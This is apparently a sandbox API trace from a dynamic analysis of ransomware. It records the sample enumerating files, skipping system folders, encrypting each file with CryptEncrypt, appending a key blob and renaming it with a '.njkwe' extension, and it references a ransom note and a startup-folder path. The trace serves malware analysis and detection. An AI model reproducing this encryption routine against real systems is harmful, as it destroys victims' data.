GetTickCount () returned 0x1153bcd [0077.613] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.613] GetProcessHeap () returned 0xbe0000 [0077.613] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.613] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0077.615] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.615] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0077.615] GetProcessHeap () returned 0xbe0000 [0077.615] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.615] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.615] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.615] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.615] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.615] CloseHandle (hObject=0x43c) returned 1 [0077.616] GetProcessHeap () returned 0xbe0000 [0077.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.616] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\245__connections_cellular_tele2 (lithuania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\245__Connections_Cellular_Tele2 (Lithuania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\245__connections_cellular_tele2 (lithuania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.617] GetProcessHeap () returned 0xbe0000 [0077.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.617] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909490d0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909490d0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909490d0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml", cAlternateFileName="246__C~1.PRO")) returned 1 [0077.617] lstrcmpiW (lpString1="246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.617] lstrcmpiW (lpString1="246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.617] lstrcmpiW (lpString1="246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.617] lstrcmpiW (lpString1="246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.617] lstrcmpiW (lpString1="246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.617] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml") returned 161 [0077.617] StrStrIW (lpFirst="246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.617] lstrcmpW (lpString1="246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.617] lstrcmpW (lpString1="246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.617] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\246__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.617] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\246__connections_cellular_tele2 (lithuania)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.617] GetTickCount () returned 0x1153bcd [0077.617] GetTickCount () returned 0x1153bcd [0077.617] GetTickCount () returned 0x1153bcd [0077.618] GetTickCount () returned 0x1153bcd [0077.618] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.618] GetProcessHeap () returned 0xbe0000 [0077.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.618] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0077.620] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.620] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0077.620] GetProcessHeap () returned 0xbe0000 [0077.620] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.620] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.620] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.620] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.620] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.620] CloseHandle (hObject=0x43c) returned 1 [0077.620] GetProcessHeap () returned 0xbe0000 [0077.621] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.621] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\246__connections_cellular_tele2 (lithuania)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\246__Connections_Cellular_Tele2 (Lithuania)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\246__connections_cellular_tele2 (lithuania)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.622] GetProcessHeap () returned 0xbe0000 [0077.622] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.622] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909490d0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909490d0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909490d0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml", cAlternateFileName="247__C~1.PRO")) returned 1 [0077.622] lstrcmpiW (lpString1="247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.622] lstrcmpiW (lpString1="247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.622] lstrcmpiW (lpString1="247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.622] lstrcmpiW (lpString1="247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.622] lstrcmpiW (lpString1="247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.622] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml") returned 162 [0077.622] StrStrIW (lpFirst="247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.622] lstrcmpW (lpString1="247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.622] lstrcmpW (lpString1="247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.622] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\247__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.622] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\247__connections_cellular_tango (luxembourg)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.622] GetTickCount () returned 0x1153bdc [0077.622] GetTickCount () returned 0x1153bdc [0077.622] GetTickCount () returned 0x1153bdc [0077.622] GetTickCount () returned 0x1153bdc [0077.622] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.622] GetProcessHeap () returned 0xbe0000 [0077.623] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.623] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x340, lpOverlapped=0x0) returned 1 [0077.624] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.624] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x340, lpOverlapped=0x0) returned 1 [0077.624] GetProcessHeap () returned 0xbe0000 [0077.624] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.624] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.624] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.624] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.625] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.625] CloseHandle (hObject=0x43c) returned 1 [0077.625] GetProcessHeap () returned 0xbe0000 [0077.625] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.625] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0077.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\247__connections_cellular_tango (luxembourg)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\247__Connections_Cellular_Tango (Luxembourg)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\247__connections_cellular_tango (luxembourg)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.625] GetProcessHeap () returned 0xbe0000 [0077.625] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.625] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909490d0, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909490d0, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909490d0, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml", cAlternateFileName="248__C~1.PRO")) returned 1 [0077.626] lstrcmpiW (lpString1="248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.626] lstrcmpiW (lpString1="248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.626] lstrcmpiW (lpString1="248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.626] lstrcmpiW (lpString1="248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.626] lstrcmpiW (lpString1="248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.626] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml") returned 163 [0077.626] StrStrIW (lpFirst="248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.626] lstrcmpW (lpString1="248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.626] lstrcmpW (lpString1="248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.626] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\248__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.626] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\248__connections_cellular_orange (luxembourg)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.626] GetTickCount () returned 0x1153bdc [0077.626] GetTickCount () returned 0x1153bdc [0077.626] GetTickCount () returned 0x1153bdc [0077.626] GetTickCount () returned 0x1153bdc [0077.626] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.626] GetProcessHeap () returned 0xbe0000 [0077.626] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.626] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0077.628] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.628] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0077.628] GetProcessHeap () returned 0xbe0000 [0077.628] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.628] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.628] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.628] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.628] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.628] CloseHandle (hObject=0x43c) returned 1 [0077.628] GetProcessHeap () returned 0xbe0000 [0077.628] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.628] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.629] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\248__connections_cellular_orange (luxembourg)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\248__Connections_Cellular_Orange (Luxembourg)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\248__connections_cellular_orange (luxembourg)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.629] GetProcessHeap () returned 0xbe0000 [0077.629] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.629] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9096f33b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9096f33b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9096f33b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="249__C~1.PRO")) returned 1 [0077.629] lstrcmpiW (lpString1="249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.629] lstrcmpiW (lpString1="249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.629] lstrcmpiW (lpString1="249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.629] lstrcmpiW (lpString1="249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.629] lstrcmpiW (lpString1="249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.629] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml") returned 159 [0077.630] StrStrIW (lpFirst="249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.630] lstrcmpW 